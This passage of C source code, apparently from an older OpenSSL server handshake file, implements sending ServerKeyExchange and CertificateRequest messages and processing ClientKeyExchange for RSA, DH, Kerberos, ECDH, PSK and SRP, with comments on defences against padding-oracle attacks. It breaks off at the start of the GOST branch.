al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
goto f_err;
}
for (i=0; i < 4 && r[i] != NULL; i++)
{
nr[i]=BN_num_bytes(r[i]);
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
n+=1+nr[i];
else
#endif
n+=2+nr[i];
}
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
if ((pkey=ssl_get_sign_pkey(s,s->s3->tmp.new_cipher,&md))
== NULL)
{
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
kn=EVP_PKEY_size(pkey);
}
else
{
pkey=NULL;
kn=0;
}
if (!BUF_MEM_grow_clean(buf,n+SSL_HM_HEADER_LENGTH(s)+kn))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_BUF);
goto err;
}
d = p = ssl_handshake_start(s);
for (i=0; i < 4 && r[i] != NULL; i++)
{
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
{
*p = nr[i];
p++;
}
else
#endif
s2n(nr[i],p);
BN_bn2bin(r[i],p);
p+=nr[i];
}
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
/* XXX: For now, we only support named (not generic) curves.
* In this situation, the serverKeyExchange message has:
* [1 byte CurveType], [2 byte CurveName]
* [1 byte length of encoded point], followed by
* the actual encoded point itself
*/
*p = NAMED_CURVE_TYPE;
p += 1;
*p = 0;
p += 1;
*p = curve_id;
p += 1;
*p = encodedlen;
p += 1;
memcpy((unsigned char*)p,
(unsigned char *)encodedPoint,
encodedlen);
OPENSSL_free(encodedPoint);
encodedPoint = NULL;
p += encodedlen;
}
#endif
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* copy PSK identity hint */
s2n(strlen(s->ctx->psk_identity_hint), p);
strncpy((char *)p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));
p+=strlen(s->ctx->psk_identity_hint);
}
#endif
/* not anonymous */
if (pkey != NULL)
{
/* n is the length of the params, they start at &(d[4])
* and p points to the space at the end. */
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
q=md_buf;
j=0;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,d,n);
EVP_DigestFinal_ex(&md_ctx,q,
(unsigned int *)&i);
q+=i;
j+=i;
}
if (RSA_sign(NID_md5_sha1, md_buf, j,
&(p[2]), &u, pkey->pkey.rsa) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_RSA);
goto err;
}
s2n(u,p);
n+=u+2;
}
else
#endif
if (md)
{
/* send signature algorithm */
if (SSL_USE_SIGALGS(s))
{
if (!tls12_get_sigandhash(p, pkey, md))
{
/* Should never happen */
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
p+=2;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using hash %s\n",
EVP_MD_name(md));
#endif
EVP_SignInit_ex(&md_ctx, md, NULL);
EVP_SignUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,d,n);
if (!EVP_SignFinal(&md_ctx,&(p[2]),
(unsigned int *)&i,pkey))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_EVP);
goto err;
}
s2n(i,p);
n+=i+2;
if (SSL_USE_SIGALGS(s))
n+= 2;
}
else
{
/* Is this error check actually needed? */
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_PKEY_TYPE);
goto f_err;
}
}
ssl_set_handshake_header(s, SSL3_MT_SERVER_KEY_EXCHANGE, n);
}
s->state = SSL3_ST_SW_KEY_EXCH_B;
EVP_MD_CTX_cleanup(&md_ctx);
return ssl_do_write(s);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
#ifndef OPENSSL_NO_ECDH
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
BN_CTX_free(bn_ctx);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
int ssl3_send_certificate_request(SSL *s)
{
unsigned char *p,*d;
int i,j,nl,off,n;
STACK_OF(X509_NAME) *sk=NULL;
X509_NAME *name;
BUF_MEM *buf;
if (s->state == SSL3_ST_SW_CERT_REQ_A)
{
buf=s->init_buf;
d=p=ssl_handshake_start(s);
/* get the list of acceptable cert types */
p++;
n=ssl3_get_req_cert_type(s,p);
d[0]=n;
p+=n;
n++;
if (SSL_USE_SIGALGS(s))
{
const unsigned char *psigs;
unsigned char *etmp = p;
nl = tls12_get_psigalgs(s, &psigs);
/* Skip over length for now */
p += 2;
nl = tls12_copy_sigalgs(s, p, psigs, nl);
/* Now fill in length */
s2n(nl, etmp);
p += nl;
n += nl + 2;
}
off=n;
p+=2;
n+=2;
sk=SSL_get_client_CA_list(s);
nl=0;
if (sk != NULL)
{
for (i=0; i<sk_X509_NAME_num(sk); i++)
{
name=sk_X509_NAME_value(sk,i);
j=i2d_X509_NAME(name,NULL);
if (!BUF_MEM_grow_clean(buf,SSL_HM_HEADER_LENGTH(s)+n+j+2))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p = ssl_handshake_start(s) + n;
if (!(s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
{
s2n(j,p);
i2d_X509_NAME(name,&p);
n+=2+j;
nl+=2+j;
}
else
{
d=p;
i2d_X509_NAME(name,&p);
j-=2; s2n(j,d); j+=2;
n+=j;
nl+=j;
}
}
}
/* else no CA names */
p = ssl_handshake_start(s) + off;
s2n(nl,p);
ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_REQUEST, n);
#ifdef NETSCAPE_HANG_BUG
if (!SSL_IS_DTLS(s))
{
if (!BUF_MEM_grow_clean(buf, s->init_num + 4))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p=(unsigned char *)s->init_buf->data + s->init_num;
/* do the header */
*(p++)=SSL3_MT_SERVER_DONE;
*(p++)=0;
*(p++)=0;
*(p++)=0;
s->init_num += 4;
}
#endif
s->state = SSL3_ST_SW_CERT_REQ_B;
}
/* SSL3_ST_SW_CERT_REQ_B */
return ssl_do_write(s);
err:
return(-1);
}
int ssl3_get_client_key_exchange(SSL *s)
{
int i,al,ok;
long n;
unsigned long alg_k;
unsigned char *p;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
EVP_PKEY *pkey=NULL;
#endif
#ifndef OPENSSL_NO_DH
BIGNUM *pub=NULL;
DH *dh_srvr, *dh_clnt = NULL;
#endif
#ifndef OPENSSL_NO_KRB5
KSSL_ERR kssl_err;
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
EC_KEY *srvr_ecdh = NULL;
EVP_PKEY *clnt_pub_pkey = NULL;
EC_POINT *clnt_ecpoint = NULL;
BN_CTX *bn_ctx = NULL;
#endif
n=s->method->ssl_get_message(s,
SSL3_ST_SR_KEY_EXCH_A,
SSL3_ST_SR_KEY_EXCH_B,
SSL3_MT_CLIENT_KEY_EXCHANGE,
2048, /* ??? */
&ok);
if (!ok) return((int)n);
p=(unsigned char *)s->init_msg;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
unsigned char rand_premaster_secret[SSL_MAX_MASTER_KEY_LENGTH];
int decrypt_len;
unsigned char decrypt_good, version_good;
size_t j;
/* FIX THIS UP EAY EAY EAY EAY */
if (s->s3->tmp.use_rsa_tmp)
{
if ((s->cert != NULL) && (s->cert->rsa_tmp != NULL))
rsa=s->cert->rsa_tmp;
/* Don't do a callback because rsa_tmp should
* be sent already */
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_PKEY);
goto f_err;
}
}
else
{
pkey=s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey;
if ( (pkey == NULL) ||
(pkey->type != EVP_PKEY_RSA) ||
(pkey->pkey.rsa == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
rsa=pkey->pkey.rsa;
}
/* TLS and [incidentally] DTLS{0xFEFF} */
if (s->version > SSL3_VERSION && s->version != DTLS1_BAD_VER)
{
n2s(p,i);
if (n != i+2)
{
if (!(s->options & SSL_OP_TLS_D5_BUG))
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
else
p-=2;
}
else
n=i;
}
/*
* Reject overly short RSA ciphertext because we want to be sure
* that the buffer size makes it safe to iterate over the entire
* size of a premaster secret (SSL_MAX_MASTER_KEY_LENGTH). The
* actual expected size is larger due to RSA padding, but the
* bound is sufficient to be safe.
*/
if (n < SSL_MAX_MASTER_KEY_LENGTH)
{
al = SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
/* We must not leak whether a decryption failure occurs because
* of Bleichenbacher's attack on PKCS #1 v1.5 RSA padding (see
* RFC 2246, section 7.4.7.1). The code follows that advice of
* the TLS RFC and generates a random premaster secret for the
* case that the decrypt fails. See
* https://tools.ietf.org/html/rfc5246#section-7.4.7.1 */
/* should be RAND_bytes, but we cannot work around a failure. */
if (RAND_pseudo_bytes(rand_premaster_secret,
sizeof(rand_premaster_secret)) <= 0)
goto err;
decrypt_len = RSA_private_decrypt((int)n,p,p,rsa,RSA_PKCS1_PADDING);
ERR_clear_error();
/* decrypt_len should be SSL_MAX_MASTER_KEY_LENGTH.
* decrypt_good will be 0xff if so and zero otherwise. */
decrypt_good = constant_time_eq_int_8(decrypt_len, SSL_MAX_MASTER_KEY_LENGTH);
/* If the version in the decrypted pre-master secret is correct
* then version_good will be 0xff, otherwise it'll be zero.
* The Klima-Pokorny-Rosa extension of Bleichenbacher's attack
* (http://eprint.iacr.org/2003/052/) exploits the version
* number check as a "bad version oracle". Thus version checks
* are done in constant time and are treated like any other
* decryption error. */
version_good = constant_time_eq_8(p[0], (unsigned)(s->client_version>>8));
version_good &= constant_time_eq_8(p[1], (unsigned)(s->client_version&0xff));
/* The premaster secret must contain the same version number as
* the ClientHello to detect version rollback attacks
* (strangely, the protocol does not offer such protection for
* DH ciphersuites). However, buggy clients exist that send the
* negotiated protocol version instead if the server does not
* support the requested protocol version. If
* SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients. */
if (s->options & SSL_OP_TLS_ROLLBACK_BUG)
{
unsigned char workaround_good;
workaround_good = constant_time_eq_8(p[0], (unsigned)(s->version>>8));
workaround_good &= constant_time_eq_8(p[1], (unsigned)(s->version&0xff));
version_good |= workaround_good;
}
/* Both decryption and version must be good for decrypt_good
* to remain non-zero (0xff). */
decrypt_good &= version_good;
/*
* Now copy rand_premaster_secret over from p using
* decrypt_good_mask. If decryption failed, then p does not
* contain valid plaintext, however, a check above guarantees
* it is still sufficiently large to read from.
*/
for (j = 0; j < sizeof(rand_premaster_secret); j++)
{
p[j] = constant_time_select_8(decrypt_good, p[j],
rand_premaster_secret[j]);
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
p,sizeof(rand_premaster_secret));
OPENSSL_cleanse(p,sizeof(rand_premaster_secret));
}
else
#endif
#ifndef OPENSSL_NO_DH
if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
int idx = -1;
EVP_PKEY *skey = NULL;
if (n)
n2s(p,i);
else
i = 0;
if (n && n != i+2)
{
if (!(s->options & SSL_OP_SSLEAY_080_CLIENT_DH_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG);
goto err;
}
else
{
p-=2;
i=(int)n;
}
}
if (alg_k & SSL_kDHr)
idx = SSL_PKEY_DH_RSA;
else if (alg_k & SSL_kDHd)
idx = SSL_PKEY_DH_DSA;
if (idx >= 0)
{
skey = s->cert->pkeys[idx].privatekey;
if ((skey == NULL) ||
(skey->type != EVP_PKEY_DH) ||
(skey->pkey.dh == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
dh_srvr = skey->pkey.dh;
}
else if (s->s3->tmp.dh == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
else
dh_srvr=s->s3->tmp.dh;
if (n == 0L)
{
/* Get pubkey from cert */
EVP_PKEY *clkey=X509_get_pubkey(s->session->peer);
if (clkey)
{
if (EVP_PKEY_cmp_parameters(clkey, skey) == 1)
dh_clnt = EVP_PKEY_get1_DH(clkey);
}
if (dh_clnt == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
EVP_PKEY_free(clkey);
pub = dh_clnt->pub_key;
}
else
pub=BN_bin2bn(p,i,NULL);
if (pub == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BN_LIB);
goto err;
}
i=DH_compute_key(p,pub,dh_srvr);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
BN_clear_free(pub);
goto err;
}
DH_free(s->s3->tmp.dh);
s->s3->tmp.dh=NULL;
if (dh_clnt)
DH_free(dh_clnt);
else
BN_clear_free(pub);
pub=NULL;
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,p,i);
OPENSSL_cleanse(p,i);
if (dh_clnt)
return 2;
}
else
#endif
#ifndef OPENSSL_NO_KRB5
if (alg_k & SSL_kKRB5)
{
krb5_error_code krb5rc;
krb5_data enc_ticket;
krb5_data authenticator;
krb5_data enc_pms;
KSSL_CTX *kssl_ctx = s->kssl_ctx;
EVP_CIPHER_CTX ciph_ctx;
const EVP_CIPHER *enc = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char pms[SSL_MAX_MASTER_KEY_LENGTH
+ EVP_MAX_BLOCK_LENGTH];
int padl, outl;
krb5_timestamp authtime = 0;
krb5_ticket_times ttimes;
EVP_CIPHER_CTX_init(&ciph_ctx);
if (!kssl_ctx) kssl_ctx = kssl_ctx_new();
n2s(p,i);
enc_ticket.length = i;
if (n < (long)(enc_ticket.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
enc_ticket.data = (char *)p;
p+=enc_ticket.length;
n2s(p,i);
authenticator.length = i;
if (n < (long)(enc_ticket.length + authenticator.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
authenticator.data = (char *)p;
p+=authenticator.length;
n2s(p,i);
enc_pms.length = i;
enc_pms.data = (char *)p;
p+=enc_pms.length;
/* Note that the length is checked again below,
** after decryption
*/
if(enc_pms.length > sizeof pms)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (n != (long)(enc_ticket.length + authenticator.length +
enc_pms.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if ((krb5rc = kssl_sget_tkt(kssl_ctx, &enc_ticket, &ttimes,
&kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_sget_tkt rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
/* Note: no authenticator is not considered an error,
** but will return authtime == 0.
*/
if ((krb5rc = kssl_check_authent(kssl_ctx, &authenticator,
&authtime, &kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_check_authent rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
if ((krb5rc = kssl_validate_times(authtime, &ttimes)) != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, krb5rc);
goto err;
}
#ifdef KSSL_DEBUG
kssl_ctx_show(kssl_ctx);
#endif /* KSSL_DEBUG */
enc = kssl_map_enc(kssl_ctx->enctype);
if (enc == NULL)
goto err;
memset(iv, 0, sizeof iv); /* per RFC 1510 */
if (!EVP_DecryptInit_ex(&ciph_ctx,enc,NULL,kssl_ctx->key,iv))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (!EVP_DecryptUpdate(&ciph_ctx, pms,&outl,
(unsigned char *)enc_pms.data, enc_pms.length))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!EVP_DecryptFinal_ex(&ciph_ctx,&(pms[outl]),&padl))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
outl += padl;
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!((pms[0] == (s->client_version>>8)) && (pms[1] == (s->client_version & 0xff))))
{
/* The premaster secret must contain the same version number as the
* ClientHello to detect version rollback attacks (strangely, the
* protocol does not offer such protection for DH ciphersuites).
* However, buggy clients exist that send random bytes instead of
* the protocol version.
* If SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients.
* (Perhaps we should have a separate BUG value for the Kerberos cipher)
*/
if (!(s->options & SSL_OP_TLS_ROLLBACK_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_AD_DECODE_ERROR);
goto err;
}
}
EVP_CIPHER_CTX_cleanup(&ciph_ctx);
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, pms, outl);
if (kssl_ctx->client_princ)
{
size_t len = strlen(kssl_ctx->client_princ);
if ( len < SSL_MAX_KRB5_PRINCIPAL_LENGTH )
{
s->session->krb5_client_princ_len = len;
memcpy(s->session->krb5_client_princ,kssl_ctx->client_princ,len);
}
}
/*- Was doing kssl_ctx_free() here,
* but it caused problems for apache.
* kssl_ctx = kssl_ctx_free(kssl_ctx);
* if (s->kssl_ctx) s->kssl_ctx = NULL;
*/
}
else
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
if (alg_k & (SSL_kECDHE|SSL_kECDHr|SSL_kECDHe))
{
int ret = 1;
int field_size = 0;
const EC_KEY *tkey;
const EC_GROUP *group;
const BIGNUM *priv_key;
/* initialize structures for server's ECDH key pair */
if ((srvr_ecdh = EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Let's get server private key and group information */
if (alg_k & (SSL_kECDHr|SSL_kECDHe))
{
/* use the certificate */
tkey = s->cert->pkeys[SSL_PKEY_ECC].privatekey->pkey.ec;
}
else
{
/* use the ephermeral values we saved when
* generating the ServerKeyExchange msg.
*/
tkey = s->s3->tmp.ecdh;
}
group = EC_KEY_get0_group(tkey);
priv_key = EC_KEY_get0_private_key(tkey);
if (!EC_KEY_set_group(srvr_ecdh, group) ||
!EC_KEY_set_private_key(srvr_ecdh, priv_key))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* Let's get client's public key */
if ((clnt_ecpoint = EC_POINT_new(group)) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if (n == 0L)
{
/* Client Publickey was in Client Certificate */
if (alg_k & SSL_kECDHE)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (((clnt_pub_pkey=X509_get_pubkey(s->session->peer))
== NULL) ||
(clnt_pub_pkey->type != EVP_PKEY_EC))
{
/* XXX: For now, we do not support client
* authentication using ECDH certificates
* so this branch (n == 0L) of the code is
* never executed. When that support is
* added, we ought to ensure the key
* received in the certificate is
* authorized for key agreement.
* ECDH_compute_key implicitly checks that
* the two ECDH shares are for the same
* group.
*/
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNABLE_TO_DECODE_ECDH_CERTS);
goto f_err;
}
if (EC_POINT_copy(clnt_ecpoint,
EC_KEY_get0_public_key(clnt_pub_pkey->pkey.ec)) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
ret = 2; /* Skip certificate verify processing */
}
else
{
/* Get client's public key from encoded point
* in the ClientKeyExchange message.
*/
if ((bn_ctx = BN_CTX_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Get encoded point length */
i = *p;
p += 1;
if (n != 1 + i)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
if (EC_POINT_oct2point(group,
clnt_ecpoint, p, i, bn_ctx) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* p is pointing to somewhere in the buffer
* currently, so set it to the start
*/
p=(unsigned char *)s->init_buf->data;
}
/* Compute the shared pre-master secret */
field_size = EC_GROUP_get_degree(group);
if (field_size <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
i = ECDH_compute_key(p, (field_size+7)/8, clnt_ecpoint, srvr_ecdh, NULL);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
EC_KEY_free(s->s3->tmp.ecdh);
s->s3->tmp.ecdh = NULL;
/* Compute the master secret */
s->session->master_key_length = s->method->ssl3_enc-> \
generate_master_secret(s, s->session->master_key, p, i);
OPENSSL_cleanse(p, i);
return (ret);
}
else
#endif
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
unsigned char *t = NULL;
unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN*2+4];
unsigned int pre_ms_len = 0, psk_len = 0;
int psk_err = 1;
char tmp_id[PSK_MAX_IDENTITY_LEN+1];
al=SSL_AD_HANDSHAKE_FAILURE;
n2s(p,i);
if (n != i+2)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_LENGTH_MISMATCH);
goto psk_err;
}
if (i > PSK_MAX_IDENTITY_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto psk_err;
}
if (s->psk_server_callback == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_NO_SERVER_CB);
goto psk_err;
}
/* Create guaranteed NULL-terminated identity
* string for the callback */
memcpy(tmp_id, p, i);
memset(tmp_id+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
psk_len = s->psk_server_callback(s, tmp_id,
psk_or_pre_ms, sizeof(psk_or_pre_ms));
OPENSSL_cleanse(tmp_id, PSK_MAX_IDENTITY_LEN+1);
if (psk_len > PSK_MAX_PSK_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
else if (psk_len == 0)
{
/* PSK related to the given identity not found */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_IDENTITY_NOT_FOUND);
al=SSL_AD_UNKNOWN_PSK_IDENTITY;
goto psk_err;
}
/* create PSK pre_master_secret */
pre_ms_len=2+psk_len+2+psk_len;
t = psk_or_pre_ms;
memmove(psk_or_pre_ms+psk_len+4, psk_or_pre_ms, psk_len);
s2n(psk_len, t);
memset(t, 0, psk_len);
t+=psk_len;
s2n(psk_len, t);
if (s->session->psk_identity != NULL)
OPENSSL_free(s->session->psk_identity);
s->session->psk_identity = BUF_strdup((char *)p);
if (s->session->psk_identity == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
if (s->session->psk_identity_hint != NULL)
OPENSSL_free(s->session->psk_identity_hint);
s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
if (s->ctx->psk_identity_hint != NULL &&
s->session->psk_identity_hint == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, psk_or_pre_ms, pre_ms_len);
psk_err = 0;
psk_err:
OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_err != 0)
goto f_err;
}
else
#endif
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
int param_len;
n2s(p,i);
param_len=i+2;
if (param_len > n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_A_LENGTH);
goto f_err;
}
if (!(s->srp_ctx.A=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
if (BN_ucmp(s->srp_ctx.A, s->srp_ctx.N) >= 0
|| BN_is_zero(s->srp_ctx.A))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
if (s->session->srp_username != NULL)
OPENSSL_free(s->session->srp_username);
s->session->srp_username = BUF_strdup(s->srp_ctx.login);
if (s->session->srp_username == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if ((s->session->master_key_length = SRP_generate_server_master_secret(s,s->session->master_key))<0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
p+=i;
}
else
#endif /* OPENSSL_NO_SRP */
if (alg_k & SSL_kGOST)
{
int ret = 0;
EVP_PKEY_CTX *pkey_ctx;
EVP_PKEY *client_pub_pkey = NULL, *pk = NULL;
unsigned char premaster_secret[32], *start;
size_t outlen=32, inlen;
unsigned long alg_a;
int Ttag, Tclass;
long Tlen;
/* Get our certificate private key*/
alg_a = s->s3->tmp.new_cipher->algorithm_auth;
